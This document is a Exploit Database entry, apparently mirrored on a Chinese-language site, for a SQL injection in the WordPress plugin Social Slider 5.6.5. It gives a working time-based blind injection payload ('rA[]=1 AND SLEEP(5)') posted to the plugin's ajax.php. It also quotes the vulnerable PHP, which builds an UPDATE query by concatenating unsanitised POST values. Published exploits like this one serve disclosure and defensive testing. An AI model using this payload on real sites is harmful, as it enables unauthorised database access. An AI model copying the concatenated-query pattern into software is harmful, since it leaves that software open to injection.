WordPress Plugin Social Slider 5.6.5 – SQL Injection

• Exploit Database
• 135 阅读

• 作者： Miroslav Stampar
  日期： 2011-08-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17617/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

  # Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability # Date: 2011-08-05 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip # Version: 5.6.5 (tested)   --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/social-slider-2/ajax.php action=ZapiszPozycje&rA[]=1 AND SLEEP(5)   --------------- Vulnerable code --------------- <?php require_once(dirname(__FILE__).&apos;/../../../wp-config.php&apos;); global $wpdb, $table_prefix;   $SocialSliderArray = $_POST[&apos;rA&apos;];   if (mysql_real_escape_string($_POST[&apos;action&apos;]) == "ZapiszPozycje") { $lC = 1; foreach ($SocialSliderArray as $recordIDValue) { $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue; mysql_query($query); $lC = $lC + 1; } } ?>